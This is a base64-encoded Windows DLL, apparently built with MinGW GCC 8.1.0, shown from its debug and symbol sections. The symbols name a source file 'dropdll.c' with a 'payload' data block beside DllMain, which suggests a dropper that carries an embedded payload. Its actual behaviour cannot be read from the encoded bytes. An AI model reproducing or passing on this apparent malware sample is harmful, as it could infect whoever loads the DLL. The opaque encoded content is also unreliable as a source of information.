BAQ0cDAAAiBRtbXhfc3RvcmUACQMBDRwMAACQFHhtbV9tb3ZlAAkFAQ18AQAAmBR5bW1fbW92ZQAJBQEXfAEAAJwUem1tX21vdmUACQYBBnwBAACgFHNzZV9sb2FkAAkHAQ3yCwAApBRzc2VfdW5hbGlnbmVkX2xvYWQACQkBDfILAAC4FHNzZV9zdG9yZQAJCgEN8gsAAMwUc3NlX3VuYWxpZ25lZF9zdG9yZQAJDAEN8gsAAOAUbW14c3NlX3RvX2ludGVnZXIACQ0BDXwBAAD0FHNzZW1teF90b19pbnRlZ2VyAAkPAQ18AQAA+BRnYXRoZXJfc3RhdGljAAkQAQ18AQAA/BVnYXRoZXJfcGVyX2VsdAAJEAEcfAEAAAABFXNjYXR0ZXJfc3RhdGljAAkSAQ18AQAABAEVc2NhdHRlcl9wZXJfZWx0AAkSAR18AQAACAEVbDFfY2FjaGVfc2l6ZQAJFAENfAEAAAwBFWwyX2NhY2hlX3NpemUACRUBDXwBAAAQARVwcmVmZXRjaF9ibG9jawAJFgENfAEAABQBFXNpbXVsdGFuZW91c19wcmVmZXRjaGVzAAkXAQ18AQAAGAEVYnJhbmNoX2Nvc3QACRkBDXwBAAAcARVmYWRkAAkaAQ18AQAAIAEVZm11bAAJGwENfAEAACQBFWZkaXYACRwBDXwBAAAoARVmYWJzAAkdAQ18AQAALAEVZmNocwAJHgENfAEAADABFWZzcXJ0AAkfAQ18AQAANAEVc3NlX29wAAkiAQ18AQAAOAEVYWRkc3MACSMBDXwBAAA8ARVtdWxzcwAJJAENfAEAAEABFW11bHNkAAklAQ18AQAARAEVZm1hc3MACSYBDXwBAABIARVmbWFzZAAJJwENfAEAAEwBFWRpdnNzAAkoAQ18AQAAUAEVZGl2c2QACSkBDXwBAABUARVzcXJ0c3MACSoBDXwBAABYARVzcXJ0c2QACSsBDXwBAABcARVyZWFzc29jX2ludAAJLAENfAEAAGABFXJlYXNzb2NfZnAACSwBGnwBAABkARVyZWFzc29jX3ZlY19pbnQACSwBJnwBAABoARVyZWFzc29jX3ZlY19mcAAJLAE3fAEAAGwBFW1lbWNweQAJMwEZIQwAAHABFW1lbXNldAAJMwEiIQwAAHgBFWNvbmRfdGFrZW5fYnJhbmNoX2Nvc3QACTQBDXwBAACAARVjb25kX25vdF90YWtlbl9icmFuY2hfY29zdAAJNgENfAEAAIQBAAPBBgAACHwBAADyCwAACRIBAAAEAAPiCwAACHwBAAAHDAAACRIBAAACAAP3CwAACHwBAAAcDAAACRIBAAABAAMMDAAABQhwBgAACml4ODZfY29zdAAJOgEmOgwAAAUI3QsAAAppeDg2X3NpemVfY29zdAAJOwEl3QsAABZpeDg2X3R1bmVfaW5kaWNlcwAHBJ8BAAAJlwEGehYAAA9YODZfVFVORV9TQ0hFRFVMRQAAD1g4Nl9UVU5FX1BBUlRJQUxfUkVHX0RFUEVOREVOQ1kAAQ9YODZfVFVORV9TU0VfUEFSVElBTF9SRUdfREVQRU5ERU5DWQACD1g4Nl9UVU5FX1NTRV9TUExJVF9SRUdTAAMPWDg2X1RVTkVfUEFSVElBTF9GTEFHX1JFR19TVEFMTAAED1g4Nl9UVU5FX01PVlgABQ9YODZfVFVORV9NRU1PUllfTUlTTUFUQ0hfU1RBTEwABg9YODZfVFVORV9GVVNFX0NNUF9BTkRfQlJBTkNIXzMyAAcPWDg2X1RVTkVfRlVTRV9DTVBfQU5EX0JSQU5DSF82NAAID1g4Nl9UVU5FX0ZVU0VfQ01QX0FORF9CUkFOQ0hfU09GTEFHUwAJD1g4Nl9UVU5FX0ZVU0VfQUxVX0FORF9CUkFOQ0gACg9YODZfVFVORV9BQ0NVTVVMQVRFX09VVEdPSU5HX0FSR1MACw9YODZfVFVORV9QUk9MT0dVRV9VU0lOR19NT1ZFAAwPWDg2X1RVTkVfRVBJTE9HVUVfVVNJTkdfTU9WRQAND1g4Nl9UVU5FX1VTRV9MRUFWRQAOD1g4Nl9UVU5FX1BVU0hfTUVNT1JZAA8PWDg2X1RVTkVfU0lOR0xFX1BVU0gAEA9YODZfVFVORV9ET1VCTEVfUFVTSAARD1g4Nl9UVU5FX1NJTkdMRV9QT1AAEg9YODZfVFVORV9ET1VCTEVfUE9QABMPWDg2X1RVTkVfUEFEX1NIT1JUX0ZVTkNUSU9OABQPWDg2X1RVTkVfUEFEX1JFVFVSTlMAFQ9YODZfVFVORV9GT1VSX0pVTVBfTElNSVQAFg9YODZfVFVORV9TT0ZUV0FSRV9QUkVGRVRDSElOR19CRU5FRklDSUFMABcPWDg2X1RVTkVfTENQX1NUQUxMABgPWDg2X1RVTkVfUkVBRF9NT0RJRlkAGQ9YODZfVFVORV9VU0VfSU5DREVDABoPWDg2X1RVTkVfSU5URUdFUl9ERk1PREVfTU9WRVMAGw9YODZfVFVORV9PUFRfQUdVABwPWDg2X1RVTkVfQVZPSURfTEVBX0ZPUl9BRERSAB0PWDg2X1RVTkVfU0xPV19JTVVMX0lNTTMyX01FTQAeD1g4Nl9UVU5FX1NMT1dfSU1VTF9JTU04AB8PWDg2X1RVTkVfQVZPSURfTUVNX09QTkRfRk9SX0NNT1ZFACAPWDg2X1RVTkVfU0lOR0xFX1NUUklOR09QACEPWDg2X1RVTkVfTUlTQUxJR05FRF9NT1ZFX1NUUklOR19QUk9fRVBJTE9HVUVTACIPWDg2X1RVTkVfVVNFX1NBSEYAIw9YODZfVFVORV9VU0VfQ0xURAAkD1g4Nl9UVU5FX1VTRV9CVAAlD1g4Nl9UVU5FX0FWT0lEX0ZBTFNFX0RFUF9GT1JfQk1JACYPWDg2X1RVTkVfQURKVVNUX1VOUk9MTAAnD1g4Nl9UVU5FX09ORV9JRl9DT05WX0lOU04AKA9YODZfVFVORV9VU0VfSElNT0RFX0ZJT1AAKQ9YODZfVFVORV9VU0VfU0lNT0RFX0ZJT1AAKg9YODZfVFVORV9VU0VfRkZSRUVQACsPWDg2X1RVTkVfRVhUXzgwMzg3X0NPTlNUQU5UUwAsD1g4Nl9UVU5FX0dFTkVSQUxfUkVHU19TU0VfU1BJTEwALQ9YODZfVFVORV9TU0VfVU5BTElHTkVEX0xPQURfT1BUSU1BTAAuD1g4Nl9UVU5FX1NTRV9VTkFMSUdORURfU1RPUkVfT1BUSU1BTAAvD1g4Nl9UVU5FX1NTRV9QQUNLRURfU0lOR0xFX0lOU05fT1BUSU1BTAAwD1g4Nl9UVU5FX1NTRV9UWVBFTEVTU19TVE9SRVMAMQ9YODZfVFVORV9TU0VfTE9BRDBfQllfUFhPUgAyD1g4Nl9UVU5FX0lOVEVSX1VOSVRfTU9WRVNfVE9fVkVDADMPWDg2X1RVTkVfSU5URVJfVU5JVF9NT1ZFU19GUk9NX1ZFQwA0D1g4Nl9UVU5FX0lOVEVSX1VOSVRfQ09OVkVSU0lPTlMANQ9YODZfVFVORV9TUExJVF9NRU1fT1BORF9GT1JfRlBfQ09OVkVSVFMANg9YODZfVFVORV9VU0VfVkVDVE9SX0ZQX0NPTlZFUlRTADcPWDg2X1RVTkVfVVNFX1ZFQ1RPUl9DT05WRVJUUwA4D1g4Nl9UVU5FX1NMT1dfUFNIVUZCADkPWDg2X1RVTkVfQVZPSURfNEJZVEVfUFJFRklYRVMAOg9YODZfVFVORV9VU0VfR0FUSEVSADsPWDg2X1RVTkVfQVZPSURfMTI4Rk1BX0NIQUlOUwA8D1g4Nl9UVU5FX0FWWDI1Nl9VTkFMSUdORURfTE9BRF9PUFRJTUFMAD0PWDg2X1RVTkVfQVZYMjU2X1VOQUxJR05FRF9TVE9SRV9PUFRJTUFMAD4PWDg2X1RVTkVfQVZYMTI4X09QVElNQUwAPw9YODZfVFVORV9BVlgyNTZfT1BUSU1BTABAD1g4Nl9UVU5FX0RPVUJMRV9XSVRIX0FERABBD1g4Nl9UVU5FX0FMV0FZU19GQU5DWV9NQVRIXzM4NwBCD1g4Nl9UVU5FX1VOUk9MTF9TVFJMRU4AQw9YODZfVFVORV9TSElGVDEARA9YODZfVFVORV9aRVJPX0VYVEVORF9XSVRIX0FORABFD1g4Nl9UVU5FX1BST01PVEVfSElNT0RFX0lNVUwARg9YODZfVFVORV9GQVNUX1BSRUZJWABHD1g4Nl9UVU5FX1JFQURfTU9ESUZZX1dSSVRFAEgPWDg2X1RVTkVfTU9WRV9NMV9WSUFfT1IASQ9YODZfVFVORV9OT1RfVU5QQUlSQUJMRQBKD1g4Nl9UVU5FX1BBUlRJQUxfUkVHX1NUQUxMAEsPWDg2X1RVTkVfUFJPTU9URV9RSU1PREUATA9YODZfVFVORV9QUk9NT1RFX0hJX1JFR1MATQ9YODZfVFVORV9ISU1PREVfTUFUSABOD1g4Nl9UVU5FX1NQTElUX0xPTkdfTU9WRVMATw9YODZfVFVORV9VU0VfWENIR0IAUA9YODZfVFVORV9VU0VfTU9WMABRD1g4Nl9UVU5FX05PVF9WRUNUT1JNT0RFAFIPWDg2X1RVTkVfQVZPSURfVkVDVE9SX0RFQ09ERQBTD1g4Nl9UVU5FX0JSQU5DSF9QUkVESUNUSU9OX0hJTlRTAFQPWDg2X1RVTkVfUUlNT0RFX01BVEgAVQ9YODZfVFVORV9QUk9NT1RFX1FJX1JFR1MAVg9YODZfVFVORV9FTUlUX1ZaRVJPVVBQRVIAVw9YODZfVFVORV9MQVNUAFgACMQBAACKFgAACRIBAABXAAppeDg2X3R1bmVfZmVhdHVyZXMACZ8BFnoWAAAWaXg4Nl9hcmNoX2luZGljZXMABwSfAQAACSICBjEXAAAPWDg2X0FSQ0hfQ01PVgAAD1g4Nl9BUkNIX0NNUFhDSEcAAQ9YODZfQVJDSF9DTVBYQ0hHOEIAAg9YODZfQVJDSF9YQUREAAMPWDg2X0FSQ0hfQlNXQVAABA9YODZfQVJDSF9MQVNUAAUACMQBAABBFwAACRIBAAAEAAppeDg2X2FyY2hfZmVhdHVyZXMACSwCFjEXAAAKeDg2X3ByZWZldGNoX3NzZQAJOwIWxAEAABdfZG9udF91c2VfdHJlZV9oZXJlXwAKeDg2X21mZW5jZQAJWQINoRcAAAUIdxcAABZyZWdfY2xhc3MABwSfAQAACSoFBqgZAAAPTk9fUkVHUwAAD0FSRUcAAQ9EUkVHAAIPQ1JFRwADD0JSRUcABA9TSVJFRwAFD0RJUkVHAAYPQURfUkVHUwAHD0NMT0JCRVJFRF9SRUdTAAgPUV9SRUdTAAkPTk9OX1FfUkVHUwAKD1RMU19HT1RCQVNFX1JFR1MACw9JTkRFWF9SRUdTAAwPTEVHQUNZX1JFR1MADQ9HRU5FUkFMX1JFR1MADg9GUF9UT1BfUkVHAA8PRlBfU0VDT05EX1JFRwAQD0ZMT0FUX1JFR1MAEQ9TU0VfRklSU1RfUkVHABIPTk9fUkVYX1NTRV9SRUdTABMPU1NFX1JFR1MAFA9FVkVYX1NTRV9SRUdTABUPQk5EX1JFR1MAFg9BTExfU1NFX1JFR1MAFw9NTVhfUkVHUwAYD0ZQX1RPUF9TU0VfUkVHUwAZD0ZQX1NFQ09ORF9TU0VfUkVHUwAaD0ZMT0FUX1NTRV9SRUdTABsPRkxPQVRfSU5UX1JFR1MAHA9JTlRfU1NFX1JFR1MAHQ9GTE9BVF9JTlRfU1NFX1JFR1MAHg9NQVNLX0VWRVhfUkVHUwAfD01BU0tfUkVHUwAgD01PRDRfU1NFX1JFR1MAIQ9BTExfUkVHUwAiD0xJTV9SRUdfQ0xBU1NFUwAjAAOnFwAACHwBAAC9GQAACRIBAABQAAOtGQAACmRieF9yZWdpc3Rlcl9tYXAACT0IEr0ZAAAKZGJ4NjRfcmVnaXN0ZXJfbWFwAAk+CBK9GQAACnN2cjRfZGJ4X3JlZ2lzdGVyX21hcAAJPwgSvRkAABZwcm9jZXNzb3JfdHlwZQAHBJ8BAAAJ2ggG7BwAAA9QUk9DRVNTT1JfR0VORVJJQwAAD1BST0NFU1NPUl9JMzg2AAEPUFJPQ0VTU09SX0k0ODYAAg9QUk9DRVNTT1JfUEVOVElVTQADD1BST0NFU1NPUl9MQUtFTU9OVAAED1BST0NFU1NPUl9QRU5USVVNUFJPAAUPUFJPQ0VTU09SX1BFTlRJVU00AAYPUFJPQ0VTU09SX05PQ09OQQAHD1BST0NFU1NPUl9DT1JFMgAID1BST0NFU1NPUl9ORUhBTEVNAAkPUFJPQ0VTU09SX1NBTkRZQlJJREdFAAoPUFJPQ0VTU09SX0hBU1dFTEwACw9QUk9DRVNTT1JfQk9OTkVMTAAMD1BST0NFU1NPUl9TSUxWRVJNT05UAA0PUFJPQ0VTU09SX0tOTAAOD1BST0NFU1NPUl9LTk0ADw9QUk9DRVNTT1JfU0tZTEFLRQAQD1BST0NFU1NPUl9TS1lMQUtFX0FWWDUxMgARD1BST0NFU1NPUl9DQU5OT05MQUtFABIPUFJPQ0VTU09SX0lDRUxBS0VfQ0xJRU5UABMPUFJPQ0VTU09SX0lDRUxBS0VfU0VSVkVSABQPUFJPQ0VTU09SX0lOVEVMABUPUFJPQ0VTU09SX0dFT0RFABYPUFJPQ0VTU09SX0s2ABcPUFJPQ0VTU09SX0FUSExPTgAYD1BST0NFU1NPUl9LOAAZD1BST0NFU1NPUl9BTURGQU0xMAAaD1BST0NFU1NPUl9CRFZFUjEAGw9QUk9DRVNTT1JfQkRWRVIyABwPUFJPQ0VTU09SX0JEVkVSMwAdD1BST0NFU1NPUl9CRFZFUjQAHg9QUk9DRVNTT1JfQlRWRVIxAB8PUFJPQ0VTU09SX0JUVkVSMgAgD1BST0NFU1NPUl9aTlZFUjEAIQ9QUk9DRVNTT1JfbWF4ACIACml4ODZfdHVuZQAJAQkcFxoAAAppeDg2X2FyY2gACQIJHBcaAAAKaXg4Nl9wcmVmZXJyZWRfc3RhY2tfYm91bmRhcnkACQkJFZ8BAAAKaXg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AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABQAAAD/////AQABeCAMBwigAQAAAAAAACwAAAAAAAAAQCj4ZwAAAAAyAAAAAAAAAEEOEIICQQ4YgANuDhDAQQ4IwgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA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